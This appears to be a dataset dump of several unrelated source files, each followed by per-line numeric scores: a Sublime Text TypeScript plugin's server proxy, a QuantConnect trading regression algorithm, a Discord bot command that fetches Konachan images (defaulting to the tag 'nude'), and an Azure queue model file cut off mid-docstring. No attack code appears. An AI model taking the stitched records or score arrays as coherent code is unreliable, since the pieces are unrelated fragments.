self.create_req_dict("documentHighlights", args) json_str = json_helpers.encode(req_dict) self.__comm.sendCmdAsync(json_str, on_completed, req_dict["seq"]) def add_event_handler(self, event_name, cb): self.__comm.add_event_handler(event_name, cb) def add_event_handler_for_worker(self, event_name, cb): self.__worker_comm.add_event_handler(event_name, cb) def create_req_dict(self, command_name, args=None): req_dict = { "command": command_name, "seq": self.increase_seq(), "type": "request" } if args: req_dict["arguments"] = args return req_dict def get_semantic_errors(self, path): args = { "file": path } req_dict = self.create_req_dict("semanticDiagnosticsSync", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_syntactic_errors(self, path): args = { "file": path } req_dict = self.create_req_dict("syntacticDiagnosticsSync", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes): args = { "file": path, "startLine": startLine, "startOffset": startOffset, "endLine": endLine, "endOffset": endOffset, "errorCodes": errorCodes } req_dict = self.create_req_dict("getCodeFixes", args) json_str = json_helpers.encode(req_dict) response_dict = self.__comm.sendCmdSync(json_str, req_dict["seq"]) return response_dict
[ "import sublime\n", "\n", "from . import json_helpers\n", "from .global_vars import IS_ST2\n", "from .node_client import CommClient\n", "from .text_helpers import Location\n", "\n", "\n", "class ServiceProxy:\n", " def __init__(self, worker_client=CommClient(), server_client=CommClient()):\n", " self.__comm = server_client\n", " self.__worker_comm = worker_client\n", " self.seq = 1\n", "\n", " def increase_seq(self):\n", " temp = self.seq\n", " self.seq += 1\n", " return temp\n", "\n", " def exit(self):\n", " req_dict = self.create_req_dict(\"exit\")\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def stop_worker(self):\n", " req_dict = self.create_req_dict(\"exit\")\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def configure(self, host_info=\"Sublime Text\", file=None, format_options=None):\n", " args = {\"hostInfo\": host_info, \"formatOptions\": format_options, \"file\": file}\n", " req_dict = self.create_req_dict(\"configure\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " self.set_inferred_project_compiler_options()\n", "\n", " def set_inferred_project_compiler_options(self):\n", " \"\"\" Add full type support for compilers running in file scope mode \"\"\"\n", " compiler_options = {\n", " \"target\": \"ESNext\", # enable all es-next features\n", " \"allowJs\": True, # enable javascript support\n", " \"jsx\": \"Preserve\", # enable jsx support\n", " \"noEmit\": True # do not emit outputs\n", " }\n", " args = { \"options\": compiler_options }\n", " req_dict = self.create_req_dict(\"compilerOptionsForInferredProjects\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def change(self, path, begin_location=Location(1, 1), end_location=Location(1, 1), insertString=\"\"):\n", " args = {\n", " \"file\": path,\n", " \"line\": begin_location.line,\n", " \"offset\": begin_location.offset,\n", " \"endLine\": end_location.line,\n", " \"endOffset\": end_location.offset,\n", " \"insertString\": insertString\n", " }\n", " req_dict = self.create_req_dict(\"change\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def completions(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"completions\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmd(\n", " json_str,\n", " lambda response_dict: None if on_completed is None else on_completed(response_dict),\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def async_completions(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"completions\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def signature_help(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"signatureHelp\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmd(\n", " json_str,\n", " lambda response_dict: None if on_completed is None else on_completed(response_dict),\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def async_signature_help(self, path, location=Location(1, 1), prefix=\"\", on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"prefix\": prefix}\n", " req_dict = self.create_req_dict(\"signatureHelp\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def definition(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"definition\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def type_definition(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"typeDefinition\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def format(self, path, begin_location=Location(1, 1), end_location=Location(1, 1)):\n", " args = {\n", " \"file\": path,\n", " \"line\": begin_location.line,\n", " \"offset\": begin_location.offset,\n", " \"endLine\": end_location.line,\n", " \"endOffset\": end_location.offset\n", " }\n", " req_dict = self.create_req_dict(\"format\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def format_on_key(self, path, location=Location(1, 1), key=\"\"):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset, \"key\": key}\n", " req_dict = self.create_req_dict(\"formatonkey\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def organize_imports(self, path):\n", " args = {\n", " \"scope\": {\n", " \"type\": \"file\",\n", " \"args\": {\n", " \"file\": path\n", " }\n", " },\n", " }\n", " req_dict = self.create_req_dict(\"organizeImports\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def open(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"open\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def open_on_worker(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"open\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def close(self, path):\n", " args = {\"file\": path}\n", " req_dict = self.create_req_dict(\"close\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def references(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"references\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload(self, path, alternate_path):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload_on_worker(self, path, alternate_path):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " response_dict = self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def reload_async(self, path, alternate_path, on_completed):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdAsync(json_str, None, req_dict[\"seq\"])\n", "\n", " def reload_async_on_worker(self, path, alternate_path, on_completed):\n", " args = {\"file\": path, \"tmpfile\": alternate_path}\n", " req_dict = self.create_req_dict(\"reload\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdAsync(json_str, None, req_dict[\"seq\"])\n", "\n", " def rename(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"rename\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " if self.__worker_comm.started():\n", " self.__worker_comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def get_applicable_refactors_async(self, path, start_loc, end_loc, on_completed):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": start_loc.line,\n", " \"startOffset\": start_loc.offset,\n", " \"endLine\": end_loc.line,\n", " \"endOffset\": end_loc.offset,\n", " }\n", " req_dict = self.create_req_dict(\"getApplicableRefactors\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def get_edits_for_refactor_async(self, path, refactor_name, action_name, start_loc, end_loc, on_completed):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": start_loc.line,\n", " \"startOffset\": start_loc.offset,\n", " \"endLine\": end_loc.line,\n", " \"endOffset\": end_loc.offset,\n", " \"refactor\": refactor_name,\n", " \"action\": action_name,\n", " }\n", " req_dict = self.create_req_dict(\"getEditsForRefactor\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", " #on_completed(response_dict)\n", " #return response_dict\n", "\n", "\n", " def request_get_err(self, delay=0, pathList=[]):\n", " args = {\"files\": pathList, \"delay\": delay}\n", " req_dict = self.create_req_dict(\"geterr\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", "\n", " def request_get_err_for_project(self, delay=0, path=\"\"):\n", " args = {\"file\": path, \"delay\": delay}\n", " req_dict = self.create_req_dict(\"geterrForProject\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " if self.__worker_comm.started():\n", " self.__worker_comm.postCmd(json_str)\n", "\n", " def type(self, path, location=Location(1, 1)):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"type\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def quick_info(self, path, location=Location(1, 1), on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"quickinfo\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " callback = on_completed or (lambda: None)\n", " if not IS_ST2:\n", " self.__comm.sendCmdAsync(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", " else:\n", " self.__comm.sendCmd(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def quick_info_full(self, path, location=Location(1, 1), on_completed=None):\n", " args = {\"file\": path, \"line\": location.line, \"offset\": location.offset}\n", " req_dict = self.create_req_dict(\"quickinfo-full\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " callback = on_completed or (lambda: None)\n", " if not IS_ST2:\n", " self.__comm.sendCmdAsync(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", " else:\n", " self.__comm.sendCmd(\n", " json_str,\n", " callback,\n", " req_dict[\"seq\"]\n", " )\n", "\n", " def save_to(self, path, alternatePath):\n", " args = {\"file\": path, \"tmpfile\": alternatePath}\n", " req_dict = self.create_req_dict(\"saveto\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.postCmd(json_str)\n", "\n", " def nav_to(self, search_text, file_name):\n", " args = {\"searchValue\": search_text, \"file\": file_name, \"maxResultCount\": 20}\n", " req_dict = self.create_req_dict(\"navto\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def project_info(self, file_name, need_file_name_list=False):\n", " args = {\"file\": file_name, \"needFileNameList\": need_file_name_list}\n", " req_dict = self.create_req_dict(\"projectInfo\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " return self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", "\n", " def async_document_highlights(self, path, location, on_completed=None):\n", " args = {\"line\": location.line, \"offset\": location.offset, \"file\": path, \"filesToSearch\": [path]}\n", " req_dict = self.create_req_dict(\"documentHighlights\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " self.__comm.sendCmdAsync(json_str, on_completed, req_dict[\"seq\"])\n", "\n", " def add_event_handler(self, event_name, cb):\n", " self.__comm.add_event_handler(event_name, cb)\n", "\n", " def add_event_handler_for_worker(self, event_name, cb):\n", " self.__worker_comm.add_event_handler(event_name, cb)\n", "\n", " def create_req_dict(self, command_name, args=None):\n", " req_dict = {\n", " \"command\": command_name,\n", " \"seq\": self.increase_seq(),\n", " \"type\": \"request\"\n", " }\n", " if args:\n", " req_dict[\"arguments\"] = args\n", " return req_dict\n", "\n", " def get_semantic_errors(self, path):\n", " args = {\n", " \"file\": path\n", " }\n", " req_dict = self.create_req_dict(\"semanticDiagnosticsSync\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def get_syntactic_errors(self, path):\n", " args = {\n", " \"file\": path\n", " }\n", " req_dict = self.create_req_dict(\"syntacticDiagnosticsSync\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n", "\n", " def get_code_fixes(self, path, startLine, startOffset, endLine, endOffset, errorCodes):\n", " args = {\n", " \"file\": path,\n", " \"startLine\": startLine,\n", " \"startOffset\": startOffset,\n", " \"endLine\": endLine,\n", " \"endOffset\": endOffset,\n", " \"errorCodes\": errorCodes\n", " }\n", " req_dict = self.create_req_dict(\"getCodeFixes\", args)\n", " json_str = json_helpers.encode(req_dict)\n", " response_dict = self.__comm.sendCmdSync(json_str, req_dict[\"seq\"])\n", " return response_dict\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0, 0, 0.0425531914893617, 0.011904761904761904, 0, 0, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0.01020408163265306, 0, 0, 0, 0, 0.010309278350515464, 0, 0, 0, 0.010638297872340425, 0.01020408163265306, 0, 0, 0, 0, 0.01098901098901099, 0.01020408163265306, 0, 0, 0, 0, 0.010309278350515464, 0, 0, 0, 0.010309278350515464, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008928571428571428, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0.02702702702702703, 0.03333333333333333, 0, 0, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009523809523809525, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
386
0.001031
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Common") AddReference("QuantConnect.Algorithm") from System import * from QuantConnect import * from QuantConnect.Orders import OrderStatus from QuantConnect.Algorithm import QCAlgorithm class AddRemoveSecurityRegressionAlgorithm(QCAlgorithm): '''Basic template algorithm simply initializes the date range and cash''' def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetStartDate(2013,10,07) #Set Start Date self.SetEndDate(2013,10,11) #Set End Date self.SetCash(100000) #Set Strategy Cash # Find more symbols here: http://quantconnect.com/data self.AddEquity("SPY") self._lastAction = None def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.''' if self._lastAction is not None and self._lastAction.date() == self.Time.date(): return if not self.Portfolio.Invested: self.SetHoldings("SPY", .5) self._lastAction = self.Time if self.Time.weekday() == 1: self.AddEquity("AIG") self.AddEquity("BAC") self._lastAction = self.Time if self.Time.weekday() == 2: self.SetHoldings("AIG", .25) self.SetHoldings("BAC", .25) self._lastAction = self.Time if self.Time.weekday() == 3: self.RemoveSecurity("AIG") self.RemoveSecurity("BAC") self._lastAction = self.Time def OnOrderEvent(self, orderEvent): if orderEvent.Status == OrderStatus.Submitted: self.Debug("{0}: Submitted: {1}".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId))) if orderEvent.Status == OrderStatus.Filled: self.Debug("{0}: Filled: {1}".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "# \n", "# Licensed under the Apache License, Version 2.0 (the \"License\"); \n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "# \n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Common\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Orders import OrderStatus\n", "from QuantConnect.Algorithm import QCAlgorithm\n", "\n", "class AddRemoveSecurityRegressionAlgorithm(QCAlgorithm):\n", " '''Basic template algorithm simply initializes the date range and cash'''\n", "\n", " def Initialize(self):\n", " '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''\n", " \n", " self.SetStartDate(2013,10,07) #Set Start Date\n", " self.SetEndDate(2013,10,11) #Set End Date\n", " self.SetCash(100000) #Set Strategy Cash\n", " # Find more symbols here: http://quantconnect.com/data\n", " self.AddEquity(\"SPY\")\n", " \n", " self._lastAction = None\n", "\n", "\n", " def OnData(self, data):\n", " '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.'''\n", " if self._lastAction is not None and self._lastAction.date() == self.Time.date():\n", " return\n", "\n", " if not self.Portfolio.Invested:\n", " self.SetHoldings(\"SPY\", .5)\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 1:\n", " self.AddEquity(\"AIG\")\n", " self.AddEquity(\"BAC\")\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 2:\n", " self.SetHoldings(\"AIG\", .25)\n", " self.SetHoldings(\"BAC\", .25)\n", " self._lastAction = self.Time\n", "\n", " if self.Time.weekday() == 3:\n", " self.RemoveSecurity(\"AIG\")\n", " self.RemoveSecurity(\"BAC\")\n", " self._lastAction = self.Time\n", "\n", " def OnOrderEvent(self, orderEvent):\n", " if orderEvent.Status == OrderStatus.Submitted:\n", " self.Debug(\"{0}: Submitted: {1}\".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))\n", " if orderEvent.Status == OrderStatus.Filled:\n", " self.Debug(\"{0}: Filled: {1}\".format(self.Time, self.Transactions.GetOrderById(orderEvent.OrderId)))" ]
[ 0, 0.012345679012345678, 0.3333333333333333, 0.014925373134328358, 0, 0.011764705882352941, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.022727272727272728, 0.02127659574468085, 0, 0.017543859649122806, 0, 0, 0, 0.006578947368421052, 0.1111111111111111, 0.05454545454545454, 0.05660377358490566, 0.017241379310344827, 0, 0, 0.1111111111111111, 0, 0, 0, 0.03571428571428571, 0.00847457627118644, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008620689655172414, 0, 0.017857142857142856 ]
67
0.019269
false
import json import secrets import aiohttp import discord async def konachan(cmd, message, args): url_base = 'https://konachan.com/post.json?limit=100&tags=' if not args: tags = 'nude' else: tags = '+'.join(args) url = url_base + tags async with aiohttp.ClientSession() as session: async with session.get(url) as data: data = await data.read() data = json.loads(data) if len(data) == 0: embed = discord.Embed(color=0x696969, title='🔍 No results.') else: post = secrets.choice(data) image_url = f'https:{post["file_url"]}' post_url = f'http://konachan.com/post/show/{post["id"]}' icon_url = 'https://i.imgur.com/qc4awFL.png' embed = discord.Embed(color=0x473a47) embed.set_author(name='Konachan', url=post_url, icon_url=icon_url) embed.set_image(url=image_url) embed.set_footer( text=f'Score: {post["score"]} | Size: {post["width"]}x{post["height"]} | Uploaded By: {post["author"]}') await message.channel.send(None, embed=embed)
[ "import json\n", "import secrets\n", "\n", "import aiohttp\n", "import discord\n", "\n", "\n", "async def konachan(cmd, message, args):\n", " url_base = 'https://konachan.com/post.json?limit=100&tags='\n", " if not args:\n", " tags = 'nude'\n", " else:\n", " tags = '+'.join(args)\n", " url = url_base + tags\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(url) as data:\n", " data = await data.read()\n", " data = json.loads(data)\n", " if len(data) == 0:\n", " embed = discord.Embed(color=0x696969, title='🔍 No results.')\n", " else:\n", " post = secrets.choice(data)\n", " image_url = f'https:{post[\"file_url\"]}'\n", " post_url = f'http://konachan.com/post/show/{post[\"id\"]}'\n", " icon_url = 'https://i.imgur.com/qc4awFL.png'\n", " embed = discord.Embed(color=0x473a47)\n", " embed.set_author(name='Konachan', url=post_url, icon_url=icon_url)\n", " embed.set_image(url=image_url)\n", " embed.set_footer(\n", " text=f'Score: {post[\"score\"]} | Size: {post[\"width\"]}x{post[\"height\"]} | Uploaded By: {post[\"author\"]}')\n", " await message.channel.send(None, embed=embed)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008547008547008548, 0 ]
31
0.000276
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- from xml.sax.saxutils import escape as xml_escape from xml.sax.saxutils import unescape as xml_unescape from base64 import ( b64encode, b64decode, ) from ._error import ( _validate_message_type_bytes, _validate_message_type_text, _ERROR_MESSAGE_NOT_BASE64, ) class Queue(object): ''' Queue class. :ivar str name: The name of the queue. :ivar metadata: A dict containing name-value pairs associated with the queue as metadata. This var is set to None unless the include=metadata param was included for the list queues operation. If this parameter was specified but the queue has no metadata, metadata will be set to an empty dictionary. :vartype metadata: dict mapping str to str ''' def __init__(self): self.name = None self.metadata = None class QueueMessage(object): ''' Queue message class. :ivar str id: A GUID value assigned to the message by the Queue service that identifies the message in the queue. This value may be used together with the value of pop_receipt to delete a message from the queue after it has been retrieved with the get messages operation. :ivar date insertion_time: A UTC date value representing the time the messages was inserted. :ivar date expiration_time: A UTC date value representing the time the message expires. :ivar int dequeue_count: Begins with a value of 1 the first time the message is dequeued. This value is incremented each time the message is subsequently dequeued. :ivar obj content: The message content. Type is determined by the decode_function set on the service. Default is str. :ivar str pop_receipt: A receipt str which can be used together with the message_id element to delete a message from the queue after it has been retrieved with the get messages operation. Only returned by get messages operations. Set to None for peek messages. :ivar date time_next_visible: A UTC date value representing the time the message will next be visible. Only returned by get messages operations. Set to None for peek messages. ''' def __init__(self): self.id = None self.insertion_time = None self.expiration_time = None self.dequeue_count = None self.content = None self.pop_receipt = None self.time_next_visible = None class QueueMessageFormat: ''' Encoding and decoding methods which can be used to modify how the queue service encodes and decodes queue messages. Set these to queueservice.encode_function and queueservice.decode_function to modify the behavior. The defaults are text_xmlencode and text_xmldecode, respectively. ''' @staticmethod def text_base64encode(data): ''' Base64 encode unicode text. :param str data: String to encode. :return: Base64 encoded string. :rtype: str ''' _validate_message_type_text(data) return b64encode(data.encode('utf-8')).decode('utf-8') @staticmethod def text_base64decode(data): ''' Base64 decode to unicode text. :param str data: String data to decode to unicode. :return: Base64 decoded string. :rtype: str ''' try: return b64decode(data.encode('utf-8')).decode('utf-8') except (ValueError, TypeError): # ValueError for Python 3, TypeError for Python 2 raise ValueError(_ERROR_MESSAGE_NOT_BASE64) @staticmethod def binary_base64encode(data): ''' Base64 encode byte strings. :param str data: Binary string to encode. :return: Base64 encoded data. :rtype: str ''' _validate_message_type_bytes(data) return b64encode(data).decode('utf-8') @staticmethod def binary_base64decode(data): ''' Base64 decode to byte string. :param str data: Data to decode to a byte string. :return: Base64 decoded data. :rtype: str ''' try: return b64decode(data.encode('utf-8')) except (ValueError, TypeError): # ValueError for Python 3, TypeError for Python 2 raise ValueError(_ERROR_MESSAGE_NOT_BASE64) @staticmethod def text_xmlencode(data): ''' XML encode unicode text. :param str data: Unicode string to encode :return: XML encoded data. :rtype: str ''' _validate_message_type_text(data) return xml_escape(data) @staticmethod def text_xmldecode(data): ''' XML decode to unicode text. :param str data: Data to decode to unicode. :return: XML decoded data. :rtype: str ''' return xml_unescape(data) @staticmethod def noencode(data): ''' Do no encoding. :param str data: Data. :return: The data passed in is returned unmodified. :rtype: str ''' return data @staticmethod def nodecode(data): ''' Do no decoding. :param str data: Data. :return: The data passed in is returned unmodified. :rtype: str ''' return data class QueuePermissions(object): ''' QueuePermissions class to be used with 